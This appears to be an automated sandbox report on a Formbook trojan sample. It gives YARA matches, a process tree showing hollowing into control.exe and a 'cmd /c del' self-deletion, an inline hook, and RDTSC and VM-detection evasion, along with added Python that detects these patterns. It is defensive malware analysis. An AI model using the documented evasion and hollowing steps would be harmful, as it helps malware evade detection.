Source: 0000000F.00000002.469299117.0000000003010000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.469299117.0000000003010000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.303482002.00000000014C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.303482002.00000000014C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.467414216.00000000001B0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.467414216.00000000001B0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: mal.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engine | Classification label: mal100.troj.evad.winEXE@7/1@2/2
Source: C:\Users\user\Desktop\mal.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\mal.exe.log
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3040:120:WilError_01
Source: mal.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\mal.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\mal.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts (2 identical entries)
Source: mal.exe | Virustotal: Detection: 60%
Source: mal.exe | Metadefender: Detection: 20%
Source: mal.exe | ReversingLabs: Detection: 63%
Source: unknown | Process created: C:\Users\user\Desktop\mal.exe 'C:\Users\user\Desktop\mal.exe'
Source: C:\Users\user\Desktop\mal.exe | Process created: C:\Users\user\Desktop\mal.exe C:\Users\user\Desktop\mal.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
Source: C:\Windows\SysWOW64\control.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\mal.exe'
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\mal.exe | Process created: C:\Users\user\Desktop\mal.exe C:\Users\user\Desktop\mal.exe
Source: C:\Windows\SysWOW64\control.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\mal.exe'
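The process tree above is itself a detection surface: the sample relaunches its own image, explorer.exe starts a SysWOW64 system binary with no arguments at all, and cmd.exe deletes the original file. The Python below is an added example, not part of the report: it runs those three rules over a constructed set of process-creation events shaped like Sysmon event 1 records. The PIDs are invented (the report does not print them), the set of hollowing hosts is deliberately limited to the one this report shows (assumption; a production rule would carry more), and the benign control.exe launch at the end is constructed to show what the rules do not fire on.

```python
import ntpath
import re

# Constructed events mirroring the process tree in this report. Joe Sandbox does not print PIDs
# in these rows, so pid/ppid values are invented (assumption) purely to express parent/child links.
EVENTS = [
    {"pid": 1000, "ppid": 1, "image": r"C:\Users\user\Desktop\mal.exe",
     "cmdline": r"'C:\Users\user\Desktop\mal.exe'"},
    {"pid": 1001, "ppid": 1000, "image": r"C:\Users\user\Desktop\mal.exe",
     "cmdline": r"C:\Users\user\Desktop\mal.exe"},
    {"pid": 1002, "ppid": 1, "image": r"C:\Windows\explorer.exe",
     "cmdline": r"C:\Windows\explorer.exe"},
    {"pid": 1003, "ppid": 1002, "image": r"C:\Windows\SysWOW64\control.exe",
     "cmdline": r"C:\Windows\SysWOW64\control.exe"},
    {"pid": 1004, "ppid": 1003, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r"/c del 'C:\Users\user\Desktop\mal.exe'"},
    {"pid": 1005, "ppid": 1004, "image": r"C:\Windows\System32\conhost.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
    # Constructed benign control: a user opening a Control Panel applet from the shell.
    {"pid": 1006, "ppid": 1002, "image": r"C:\Windows\System32\control.exe",
     "cmdline": r"control.exe /name Microsoft.NetworkAndSharingCenter"},
]

# System binaries observed as hollowing hosts. Only the one from this report is listed (assumption).
HOLLOW_HOSTS = {"control.exe"}


def _name(path):
    return ntpath.basename(path).lower()


def _bare_command_line(event):
    """True when the command line is nothing but the image path: no switches, no arguments."""
    return event["cmdline"].strip("'\" ").lower() == event["image"].lower()


def detect(events, sample_path):
    """Return (rule, pid) findings reproducing the process-tree signals of this report."""
    by_pid = {e["pid"]: e for e in events}
    sample = sample_path.lower()
    findings = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        name = _name(e["image"])
        # Rule 1: a process relaunching its own image, the suspended-child setup used for RunPE.
        if parent and parent["image"].lower() == e["image"].lower():
            findings.append(("self-relaunch of own image", e["pid"]))
        # Rule 2: explorer.exe starting a known hollowing host with a bare command line.
        if parent and _name(parent["image"]) == "explorer.exe" and name in HOLLOW_HOSTS \
                and _bare_command_line(e):
            findings.append(("bare launch of hollowing host from explorer.exe", e["pid"]))
        # Rule 3: cmd.exe deleting the original sample, the dropper cleaning up after injection.
        if name == "cmd.exe" and re.search(r"/c\s+del\b", e["cmdline"], re.I) \
                and sample in e["cmdline"].lower():
            findings.append(("self-deletion of sample via cmd /c del", e["pid"]))
    return findings


if __name__ == "__main__":
    for rule, pid in detect(EVENTS, r"C:\Users\user\Desktop\mal.exe"):
        print(f"pid {pid}: {rule}")
```

Rule 2 is the one worth tuning: the signal is not control.exe itself but a 64-bit shell starting a 32-bit copy of it with no arguments, which a user clicking through the Control Panel never produces. Rule 3 keys on the sample's own path so that ordinary `cmd /c del` cleanup in installers does not match.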
Source: C:\Users\user\Desktop\mal.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: mal.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: mal.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wntdll.pdbUGP source: mal.exe, 00000002.00000002.303734652.0000000001690000.00000040.00000001.sdmp, control.exe, 0000000F.00000002.469738032.000000000466F000.00000040.00000001.sdmp
          Source: Binary string: control.pdb source: mal.exe, 00000002.00000002.303620114.0000000001530000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: mal.exe, 00000002.00000002.303734652.0000000001690000.00000040.00000001.sdmp, control.exe
          Source: Binary string: control.pdbUGP source: mal.exe, 00000002.00000002.303620114.0000000001530000.00000040.00000001.sdmp
Source: C:\Users\user\Desktop\mal.exe | Code function: 2_2_0041CEB5 push eax; ret
Source: C:\Users\user\Desktop\mal.exe | Code function: 2_2_0041CF6C push eax; ret
Source: C:\Users\user\Desktop\mal.exe | Code function: 2_2_0041CF02 push eax; ret
Source: C:\Users\user\Desktop\mal.exe | Code function: 2_2_0041CF0B push eax; ret
Source: C:\Users\user\Desktop\mal.exe | Code function: 2_2_00A97535 push esp; retf
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_045CD0D1 push ecx; ret
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_0302CF02 push eax; ret
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_0302CF0B push eax; ret
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_0302CF6C push eax; ret
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_0302CEB5 push eax; ret
Source: initial sample | Static PE information: section name: .text entropy: 7.85599061274

          Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe | User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x80 0x0E 0xEE
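The entry above records the first bytes of user32!PeekMessageA being rewritten inside explorer.exe. The practical check for this class of tampering is to compare each exported function's in-memory prolog with the on-disk copy and decode whatever stub replaced it. The Python below is an added example, not part of the report: the six bytes for PeekMessageA are the ones printed above, but the "clean" prolog, the load address, the assumption that exactly those six bytes were overwritten, and the two other functions are constructed for illustration.

```python
import struct

MASK64 = (1 << 64) - 1

# Constructed inputs. Only the six leading "memory" bytes of PeekMessageA come from this report;
# the clean prolog, the addresses and the other two functions are invented (assumption).
CLEAN_PEEKMESSAGEA = bytes.fromhex("48 89 5C 24 08 48 89 74 24 10 57 48 83 EC 20")
FUNCTIONS = {
    "user32!PeekMessageA": {
        "address": 0x7FF8_1234_0000,
        "clean": CLEAN_PEEKMESSAGEA,
        # assumption: the hook overwrote exactly the six bytes the report shows, nothing after them
        "memory": bytes.fromhex("48 8B B8 80 0E EE") + CLEAN_PEEKMESSAGEA[6:],
    },
    "example!HookedByJmp": {
        "address": 0x7FF7_1000_0000,
        "clean": bytes.fromhex("4C 8B D1 B8 45 00 00 00"),
        "memory": bytes.fromhex("E9 FB 0F 00 00 00 00 00"),   # jmp +0x0FFB
    },
    "example!Untouched": {
        "address": 0x7FF7_2000_0000,
        "clean": bytes.fromhex("40 53 48 83 EC 20"),
        "memory": bytes.fromhex("40 53 48 83 EC 20"),
    },
}


def decode_trampoline(stub, stub_address):
    """Recognize the common inline-hook stubs; return (kind, target) or ("unknown", None)."""
    if len(stub) >= 5 and stub[0] == 0xE9:                       # jmp rel32
        rel = struct.unpack_from("<i", stub, 1)[0]
        return "jmp rel32", (stub_address + 5 + rel) & MASK64
    if len(stub) >= 6 and stub[:2] == b"\xFF\x25":               # jmp [rip+disp32] (x64)
        disp = struct.unpack_from("<i", stub, 2)[0]
        return "jmp [rip+disp32]", (stub_address + 6 + disp) & MASK64
    if len(stub) >= 12 and stub[:2] == b"\x48\xB8" and stub[10:12] == b"\xFF\xE0":
        return "mov rax/jmp rax", struct.unpack_from("<Q", stub, 2)[0]   # mov rax, imm64; jmp rax
    if len(stub) >= 6 and stub[0] == 0x68 and stub[5] == 0xC3:    # push imm32; ret
        return "push/ret", struct.unpack_from("<I", stub, 1)[0]
    return "unknown", None


def find_hooks(functions):
    """Compare each in-memory prolog with the on-disk copy and describe any stub found."""
    findings = {}
    for name, f in functions.items():
        n = min(len(f["clean"]), len(f["memory"]))
        diff = [i for i in range(n) if f["clean"][i] != f["memory"][i]]
        if not diff:
            continue                                              # byte-identical: no hook
        kind, target = decode_trampoline(f["memory"], f["address"])
        findings[name] = {"first_diff": diff[0], "stub": kind, "target": target}
    return findings


if __name__ == "__main__":
    for name, info in find_hooks(FUNCTIONS).items():
        target = f"{info['target']:#x}" if info["target"] is not None else "?"
        print(f"{name}: modified at byte {info['first_diff']}, stub={info['stub']}, target={target}")
```

For PeekMessageA the replaced bytes match none of the usual trampolines, so the function is reported as modified with an unknown stub. That is the honest answer when the evidence is six bytes; the next step is to dump the full prolog from the live process rather than guess at the stub's shape. In a real scan the "clean" bytes come from mapping the DLL from disk and applying relocations, not from a constant.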
Source: C:\Users\user\Desktop\mal.exe | Process information set: NOOPENFILEERRORBOX (32 identical entries)
Source: C:\Windows\SysWOW64\control.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\mal.exe | RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mal.exe | RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\control.exe | RDTSC instruction interceptor: First address: 00000000030198E4 second address: 00000000030198EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\control.exe | RDTSC instruction interceptor: First address: 0000000003019B5E second address: 0000000003019B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mal.exe | Code function: 2_2_00409A90 rdtsc
Source: C:\Users\user\Desktop\mal.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\mal.exe TID: 6020 | Thread sleep time: -54846s >= -30000s
Source: C:\Users\user\Desktop\mal.exe TID: 412 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe TID: 4840 | Thread sleep time: -38000s >= -30000s
Source: C:\Windows\SysWOW64\control.exe TID: 1320 | Thread sleep time: -35000s >= -30000s
Source: C:\Windows\explorer.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\mal.exe | Thread delayed: delay time: 54846
Source: C:\Users\user\Desktop\mal.exe | Thread delayed: delay time: 922337203685477
          Source: explorer.exe, 00000003.00000000.274123090.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000003.00000000.274123090.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: explorer.exe, 00000003.00000000.254840052.0000000001398000.00000004.00000020.sdmpBinary or memory string: War&Prod_VMware_SATAR
          Source: explorer.exe, 00000003.00000000.271180653.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000003.00000000.273881536.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.292643668.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: explorer.exe, 00000003.00000000.274123090.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000003.00000000.274123090.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000003.00000000.274403765.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
          Source: explorer.exe, 00000003.00000000.264498703.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: explorer.exe, 00000003.00000000.271180653.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000003.00000000.271180653.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000003.00000000.271180653.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\mal.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\mal.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\control.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\mal.exeCode function: 2_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\mal.exeCode function: 2_2_0040ACD0 LdrLoadDll,
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045AA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0460C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0459746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045F6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04631C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0464740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045ABC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_046314FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045F6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04648CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0458849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04597D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045B3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045F3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04623D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0459C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04648D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0463E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045A4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0457AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045FA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04583D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0463FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04628DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045F6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045F6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0458D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045AFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_046405AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045A2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04572D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045A1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045A35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04587E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0463AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0459AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0458766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045AA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0457C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045A8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0462FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04631608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0457E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045A36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045B8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0462FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04648ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045A16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045876E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04640EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0460FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045F46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04648F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0458EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0458FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0459F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045AA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0464070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045AE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0460FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04574F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045B37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045F7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04588794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04590050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04632073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04641074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045F7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04644015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0458B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045A002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0460B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0460B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045740E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045758EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04579080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045F3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045AF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045AF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045B90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045A20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0459B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0457B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0457C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04579100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045A513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04594120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04594120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_046041E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0457B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_046349A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045A2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0459C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045AA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045F51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045F69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045A61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0462B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04648A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04579240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045B927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0463EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04604257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0457AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04593A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04575210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04575210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04588A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0463AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045B4A2C mov eax, dword ptr fs:[00000030h]
